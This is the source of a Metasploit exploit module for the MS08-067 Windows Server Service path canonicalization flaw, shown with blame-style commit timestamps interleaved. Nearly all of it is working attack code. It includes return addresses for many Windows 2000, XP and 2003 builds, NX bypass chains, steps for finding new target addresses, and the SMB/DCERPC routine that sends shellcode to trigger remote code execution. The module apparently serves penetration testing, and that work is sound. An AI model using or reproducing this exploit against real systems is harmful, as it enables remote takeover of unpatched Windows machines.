2008-10-28 07:35:17 +00:00
|
|
|
##
|
2008-10-30 07:21:53 +00:00
|
|
|
# $Id$
|
2008-10-28 07:35:17 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
##
|
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
|
# http://metasploit.com/projects/Framework/
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::DCERPC
|
|
|
|
|
include Msf::Exploit::Remote::SMB
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'Microsoft Server Service Relative Path Stack Corruption',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a parsing flaw in the path canonicalization code of
|
|
|
|
|
NetAPI32.dll through the Server Service. This module is capable of bypassing
|
2008-10-31 05:16:02 +00:00
|
|
|
NX on some operating systems and service packs. The correct target must be
|
2008-10-28 07:35:17 +00:00
|
|
|
used to prevent the Server Service (along with a dozen others in the same
|
|
|
|
|
process) from crashing. Windows XP targets seem to handle multiple successful
|
|
|
|
|
exploitation events, but 2003 targets will often crash or hang on subsequent
|
|
|
|
|
attempts. This is just the first version of this module, full support for
|
2008-10-31 05:16:02 +00:00
|
|
|
NX bypass on 2003, along with other platforms, is still in development.
|
2008-10-28 07:35:17 +00:00
|
|
|
},
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
2008-10-31 05:16:02 +00:00
|
|
|
'hdm', # with tons of input/help/testing from the community
|
|
|
|
|
'Brett Moore <brett.moore[at]insomniasec.com>'
|
2008-10-28 07:35:17 +00:00
|
|
|
],
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
[ 'CVE', '2008-4250'],
|
|
|
|
|
[ 'MSB', 'MS08-067' ],
|
|
|
|
|
],
|
|
|
|
|
'DefaultOptions' =>
|
|
|
|
|
{
|
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
|
},
|
|
|
|
|
'Privileged' => true,
|
|
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Space' => 400,
|
|
|
|
|
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
|
|
|
|
|
'Prepend' => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment
|
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
|
|
|
|
|
|
},
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
2008-10-31 05:16:02 +00:00
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Antoine's universal for Windows 2000 with MS06-040 applied
|
|
|
|
|
# Use ms06_040_netapi for systems without this patch.
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows 2000 MS06-040+ (YMMV pre MS06-040)',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x001f1cb0,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP EDI Windows 2000 Universal
|
2008-10-31 06:12:49 +00:00
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Standard return-to-ESI without NX bypass
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows XP SP0 English (NO NX)',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x71aa1a7c,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI WS2HELP.DLL
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Standard return-to-ESI without NX bypass
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows XP SP1 English (NO NX)',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x71aa1a61,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI WS2HELP.DLL
|
2008-10-31 05:16:02 +00:00
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Metasploit's NX bypass for XP SP2/SP3
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows XP SP2 English (NX)',
|
2008-10-28 07:35:17 +00:00
|
|
|
{
|
|
|
|
|
'Ret' => 0x6f88f727,
|
|
|
|
|
'DisableNX' => 0x6F8916E2,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
2008-10-31 05:16:02 +00:00
|
|
|
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Metasploit's NX bypass for XP SP2/SP3
|
|
|
|
|
# Target provided by Giorgio Casali <giorgio.casali[at]gmail.com>
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows XP SP2 Italian (NX)',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x596bf727,
|
|
|
|
|
'DisableNX' => 0x596c16e2,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
|
|
|
|
|
2008-10-31 11:45:52 +00:00
|
|
|
#
|
|
|
|
|
# Metasploit's NX bypass for XP SP2/SP3
|
|
|
|
|
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows XP SP2 Portuguese (Brazil) (NX)',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x596ff727,
|
|
|
|
|
'DisableNX' => 0x597016e2,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
|
2008-10-31 05:16:02 +00:00
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Metasploit's NX bypass for XP SP2/SP3
|
|
|
|
|
# Target provided by sunwear <shellcoder[at]hotmail.com>
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows XP SP2 Chinese (NX)',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x58fcda43,
|
|
|
|
|
'DisableNX' => 0x58fc16e2,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Metasploit's NX bypass for XP SP2/SP3
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows XP SP3 English (NX)',
|
2008-10-28 07:35:17 +00:00
|
|
|
{
|
|
|
|
|
'Ret' => 0x6f88f807,
|
|
|
|
|
'DisableNX' => 0x6F8917C2,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
2008-10-31 05:16:02 +00:00
|
|
|
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Metasploit's NX bypass for XP SP2/SP3
|
2008-10-31 14:07:58 +00:00
|
|
|
# Target provided by Ulises2k <ulises2k[at]gmail.com>
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows XP SP3 Spanish (NX)',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x6fdbf807,
|
|
|
|
|
'DisableNX' => 0x6fdc17c2,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
|
|
|
|
#
|
|
|
|
|
# Metasploit's NX bypass for XP SP2/SP3
|
2008-10-31 05:16:02 +00:00
|
|
|
# Target provided by Thierry Zoller <Thierry[at]zoller.lu>
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows XP SP3 German (NX)',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x6fda2bef,
|
|
|
|
|
'DisableNX' => 0x6fda17c2,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
|
2008-10-31 11:45:52 +00:00
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Metasploit's NX bypass for XP SP2/SP3
|
|
|
|
|
# Target provided by Ramon de C. Valle <ramon@risesecurity.org>
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows XP SP3 Portuguese (Brazil) (NX)',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x596ff807,
|
|
|
|
|
'DisableNX' => 0x597017c2,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
|
2008-10-31 05:16:02 +00:00
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Standard return-to-ESI without NX bypass
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows 2003 SP0 English (NO NX)',
|
2008-10-28 07:35:17 +00:00
|
|
|
{
|
|
|
|
|
'Ret' => 0x71bf175f,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI WS2HELP.DLL
|
2008-10-31 05:55:57 +00:00
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Standard return-to-ESI without NX bypass
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows 2003 SP1 English (NO NX)',
|
|
|
|
|
{
|
|
|
|
|
'Ret' => 0x71bf21a2,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI WS2HELP.DLL
|
|
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
#
|
|
|
|
|
# Standard return-to-ESI without NX bypass
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows 2003 SP2 English (NO NX)',
|
2008-10-28 07:35:17 +00:00
|
|
|
{
|
|
|
|
|
'Ret' => 0x71bf3969,
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
], # JMP ESI WS2HELP.DLL
|
2008-10-31 05:55:57 +00:00
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Brett Moore's crafty NX bypass for 2003 SP1
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows 2003 SP1 English (NX)',
|
|
|
|
|
{
|
|
|
|
|
'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
|
|
|
|
|
'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
|
|
|
|
|
'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
|
|
|
|
|
'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
#
|
|
|
|
|
# Brett Moore's crafty NX bypass for 2003 SP2
|
|
|
|
|
#
|
|
|
|
|
[ 'Windows 2003 SP2 English (NX)',
|
|
|
|
|
{
|
|
|
|
|
'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
|
|
|
|
|
'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
|
|
|
|
|
'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
|
|
|
|
|
'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
|
|
|
|
|
'Scratch' => 0x00020408,
|
|
|
|
|
}
|
|
|
|
|
]
|
|
|
|
|
|
2008-10-28 07:35:17 +00:00
|
|
|
#
|
|
|
|
|
# Missing Targets
|
|
|
|
|
# Key: T=TODO ?=UNKNOWN U=UNRELIABLE
|
|
|
|
|
#
|
|
|
|
|
# [?] Windows Vista SP0 - Not tested yet
|
|
|
|
|
# [?] Windows Vista SP1 - Not tested yet
|
|
|
|
|
#
|
|
|
|
|
],
|
|
|
|
|
|
|
|
|
|
'DisclosureDate' => 'Oct 28 2008'))
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
|
|
|
|
|
], self.class)
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
=begin
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
*** WINDOWS XP SP2/SP3 TARGETS ***
|
|
|
|
|
|
|
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
This exploit bypasses NX/NX by returning to a function call inside acgenral.dll that disables NX
|
2008-10-28 07:35:17 +00:00
|
|
|
for the process and then returns back to a call ESI instruction. These addresses are different
|
|
|
|
|
between operating systems, service packs, and language packs, but the steps below can be used to
|
|
|
|
|
add new targets.
|
|
|
|
|
|
|
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
If the target system does not have NX/NX, just place a "call ESI" return into both the Ret and
|
2008-10-28 07:35:17 +00:00
|
|
|
DisableNX elements of the target hash.
|
|
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
If the target system does have NX/NX, obtain a copy of the acgenral.dll from that system.
|
2008-10-28 07:35:17 +00:00
|
|
|
First obtain the value for the Ret element of the hash with the following command:
|
|
|
|
|
|
|
|
|
|
$ msfpescan -j esi acgenral.dll
|
|
|
|
|
|
|
|
|
|
Pick whatever address you like, just make sure it does not contain 00 0a 0d 5c 2f or 2e.
|
|
|
|
|
|
|
|
|
|
Next, find the location of the function we use to disable NX. Use the following command:
|
|
|
|
|
|
|
|
|
|
$ msfpescan -r "\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF" acgenral.dll
|
|
|
|
|
|
|
|
|
|
This address should be placed into the DisableNX element of the target hash.
|
|
|
|
|
|
|
|
|
|
The Scratch element of 0x00020408 should work on all versions of Windows
|
|
|
|
|
|
|
|
|
|
The actual function we use to disable NX looks like this:
|
|
|
|
|
|
|
|
|
|
push 4
|
|
|
|
|
lea eax, [ebp+arg_0]
|
|
|
|
|
push eax
|
|
|
|
|
push 22h
|
|
|
|
|
push 0FFFFFFFFh
|
|
|
|
|
mov [ebp+arg_0], 2
|
|
|
|
|
call ds:__imp__NtSetInformationProcess@16
|
|
|
|
|
|
|
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
*** WINDOWS XP NON-NX TARGETS ***
|
2008-10-28 07:35:17 +00:00
|
|
|
|
|
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
Instead of bypassing NX, just return directly to a "JMP ESI", which takes us to the short
|
2008-10-31 06:12:49 +00:00
|
|
|
jump, and finally the shellcode.
|
2008-10-28 07:35:17 +00:00
|
|
|
|
|
|
|
|
|
|
|
|
|
*** WINDOWS 2003 SP2 TARGETS ***
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
There are only two possible ways to return to NtSetInformationProcess on Windows 2003 SP2,
|
|
|
|
|
both of these are inside NTDLL.DLL and use a return method that is not directly compatible
|
2008-10-31 06:12:49 +00:00
|
|
|
with our call stack. To solve this, Brett Moore figured out a multi-step return call chain
|
|
|
|
|
that eventually leads to the NX bypass function.
|
2008-10-28 07:35:17 +00:00
|
|
|
|
|
|
|
|
|
|
|
|
|
*** WINDOWS 2000 TARGETS ***
|
|
|
|
|
|
|
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
No NX to bypass, just return directly to a "JMP EDX", which takes us to the short
|
|
|
|
|
jump, and finally the shellcode. Systems without MS06-040 applied act differently
|
|
|
|
|
and should not be targeted with this exploit.
|
2008-10-28 07:35:17 +00:00
|
|
|
|
|
|
|
|
|
|
|
|
|
*** WINDOWS VISTA TARGETS ***
|
|
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
Currently untested, will involve ASLR and NX, should be fun.
|
2008-10-28 07:35:17 +00:00
|
|
|
|
|
|
|
|
|
|
|
|
|
*** NetprPathCanonicalize IDL ***
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
NET_API_STATUS NetprPathCanonicalize(
|
|
|
|
|
[in, string, unique] SRVSVC_HANDLE ServerName,
|
|
|
|
|
[in, string] WCHAR* PathName,
|
|
|
|
|
[out, size_is(OutbufLen)] unsigned char* Outbuf,
|
|
|
|
|
[in, range(0,64000)] DWORD OutbufLen,
|
|
|
|
|
[in, string] WCHAR* Prefix,
|
|
|
|
|
[in, out] DWORD* PathType,
|
|
|
|
|
[in] DWORD Flags
|
|
|
|
|
);
|
|
|
|
|
|
|
|
|
|
=end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
|
|
print_status("Connecting to the target...")
|
|
|
|
|
|
|
|
|
|
connect()
|
|
|
|
|
smb_login()
|
|
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Build the malicious path name
|
|
|
|
|
#
|
|
|
|
|
|
|
|
|
|
padder = [*("A".."Z")]
|
|
|
|
|
pad = "A"
|
|
|
|
|
while(pad.length < 7)
|
|
|
|
|
c = padder[rand(padder.length)]
|
|
|
|
|
next if pad.index(c)
|
|
|
|
|
pad += c
|
|
|
|
|
end
|
|
|
|
|
|
2008-10-30 07:21:53 +00:00
|
|
|
prefix = "\\"
|
2008-10-31 05:16:02 +00:00
|
|
|
path = ""
|
2008-10-28 07:35:17 +00:00
|
|
|
server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
|
|
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
|
|
|
|
|
#
|
|
|
|
|
# Windows 2000, XP (NX), and 2003 (NO NX) targets
|
|
|
|
|
#
|
|
|
|
|
if(not target['RetDec'])
|
2008-10-28 07:35:17 +00:00
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
jumper = Rex::Text.rand_text_alpha(70).upcase
|
|
|
|
|
jumper[ 4,4] = [target.ret].pack("V")
|
2008-10-31 06:12:49 +00:00
|
|
|
jumper[50,8] = make_nops(8)
|
2008-10-31 05:16:02 +00:00
|
|
|
jumper[58,2] = "\xeb\x62"
|
2008-10-28 07:35:17 +00:00
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
path =
|
|
|
|
|
Rex::Text.to_unicode("\\") +
|
2008-10-28 07:35:17 +00:00
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
# This buffer is removed from the front
|
|
|
|
|
Rex::Text.rand_text_alpha(100) +
|
2008-10-28 07:35:17 +00:00
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
# Shellcode
|
|
|
|
|
payload.encoded +
|
2008-10-28 07:35:17 +00:00
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
# Relative path to trigger the bug
|
|
|
|
|
Rex::Text.to_unicode("\\..\\..\\") +
|
2008-10-28 07:35:17 +00:00
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
# Extra padding
|
|
|
|
|
Rex::Text.to_unicode(pad) +
|
2008-10-28 07:35:17 +00:00
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
# Writable memory location (static)
|
|
|
|
|
[target['Scratch']].pack("V") + # EBP
|
2008-10-28 07:35:17 +00:00
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
# Return to code which disables NX (or just the return)
|
|
|
|
|
[ target['DisableNX'] || target.ret ].pack("V") +
|
2008-10-28 07:35:17 +00:00
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
# Padding with embedded jump
|
|
|
|
|
jumper +
|
2008-10-28 07:35:17 +00:00
|
|
|
|
2008-10-31 05:16:02 +00:00
|
|
|
# NULL termination
|
|
|
|
|
"\x00" * 2
|
|
|
|
|
#
|
|
|
|
|
# Windows 2003 SP2 (NX) targets
|
|
|
|
|
#
|
|
|
|
|
else
|
|
|
|
|
|
|
|
|
|
jumper = Rex::Text.rand_text_alpha(70).upcase
|
|
|
|
|
jumper[ 0,4] = [target['RetDec']].pack("V")# one more to Align and make room
|
|
|
|
|
|
|
|
|
|
jumper[ 4,4] = [target['RetDec']].pack("V") # 4 more for space
|
|
|
|
|
jumper[ 8,4] = [target['RetDec']].pack("V")
|
|
|
|
|
jumper[ 12,4] = [target['RetDec']].pack("V")
|
|
|
|
|
jumper[ 16,4] = [target['RetDec']].pack("V")
|
|
|
|
|
|
|
|
|
|
jumper[ 20,4] = [target['RetPop']].pack("V")# pop to EBP
|
|
|
|
|
jumper[ 24,4] = [target['DisableNX']].pack("V")
|
|
|
|
|
|
|
|
|
|
jumper[ 56,4] = [target['JmpESP']].pack("V")
|
|
|
|
|
jumper[ 60,4] = [target['JmpESP']].pack("V")
|
|
|
|
|
jumper[ 64,2] = "\xeb\x02" # our jump
|
|
|
|
|
jumper[ 68,2] = "\xeb\x62" # original
|
|
|
|
|
|
|
|
|
|
path =
|
|
|
|
|
Rex::Text.to_unicode("\\") +
|
|
|
|
|
|
|
|
|
|
# This buffer is removed from the front
|
|
|
|
|
Rex::Text.rand_text_alpha(100) +
|
|
|
|
|
|
|
|
|
|
# Shellcode
|
|
|
|
|
payload.encoded +
|
|
|
|
|
|
|
|
|
|
# Relative path to trigger the bug
|
|
|
|
|
Rex::Text.to_unicode("\\..\\..\\") +
|
|
|
|
|
|
|
|
|
|
# Extra padding
|
|
|
|
|
Rex::Text.to_unicode(pad) +
|
|
|
|
|
|
|
|
|
|
# Writable memory location (static)
|
|
|
|
|
[target['Scratch']].pack("V") + # EBP
|
|
|
|
|
|
|
|
|
|
# Return to code which disables NX (or just the return)
|
|
|
|
|
[target['RetDec']].pack("V") +
|
|
|
|
|
|
|
|
|
|
# Padding with embedded jump
|
|
|
|
|
jumper +
|
|
|
|
|
|
|
|
|
|
# NULL termination
|
|
|
|
|
"\x00" * 2
|
|
|
|
|
|
|
|
|
|
end
|
2008-10-28 07:35:17 +00:00
|
|
|
|
|
|
|
|
handle = dcerpc_handle(
|
|
|
|
|
'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
|
|
|
|
|
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
|
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
print_status("Binding to #{handle} ...")
|
|
|
|
|
dcerpc_bind(handle)
|
|
|
|
|
print_status("Bound to #{handle} ...")
|
|
|
|
|
|
|
|
|
|
stub =
|
|
|
|
|
NDR.uwstring(server) +
|
|
|
|
|
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
|
|
|
|
|
NDR.long(rand(1024)) +
|
2008-10-31 05:16:02 +00:00
|
|
|
NDR.wstring(prefix) +
|
2008-10-28 07:35:17 +00:00
|
|
|
NDR.long(4097) +
|
|
|
|
|
NDR.long(0)
|
|
|
|
|
|
|
|
|
|
begin
|
|
|
|
|
print_status("Triggering the vulnerability...")
|
2008-10-30 07:21:53 +00:00
|
|
|
dcerpc.call(0x1f, stub)
|
|
|
|
|
|
2008-10-28 07:35:17 +00:00
|
|
|
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
|
|
|
|
rescue => e
|
|
|
|
|
if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
|
|
|
|
|
raise e
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
# Cleanup
|
|
|
|
|
handler
|
|
|
|
|
disconnect
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|
